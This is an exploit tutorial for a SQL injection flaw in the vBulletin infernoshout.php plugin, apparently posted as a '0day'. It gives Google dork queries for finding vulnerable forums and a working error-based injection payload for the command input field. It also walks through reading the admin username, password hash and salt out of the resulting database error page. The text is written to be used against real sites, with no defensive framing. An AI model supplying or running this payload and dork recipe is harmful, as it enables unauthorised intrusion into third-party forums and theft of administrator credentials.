vBulletin infernoshout.php 0day

Description:
STEP 1)FINDING THE Vulnerable Forums Using Google DORKS.
Go to Google.com and TYPE :

INURL: infernoshout.php

OR inurl: infernoshout.php?do=options&area=commands


STEP 2)FINDING THE SITE (Check the PICS)

STEP 3) Goo Here Exploit link: http://site.com/infernoshout.php?do=options&area=commands


STEP 4 ) INPUTTING THE CODE :
Go to the Commands Area where it says command Input and command output in the first Link
pass these commands :

COMMAND INPUT :
' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#


COMMAND OUTPUT :type anything there It doesnt really matter .
and Hit save setting.


STEP 5) DATABASE ERROR :When you hit Save it will generate a DATABASE error and Press Control+ U you will get the source

STEP 6) VIEW SOURCE: press clt+u and scroll down the end of the page you will get the admin details

such as USERNAME:HASH:SALT


Enjoy :) The Hack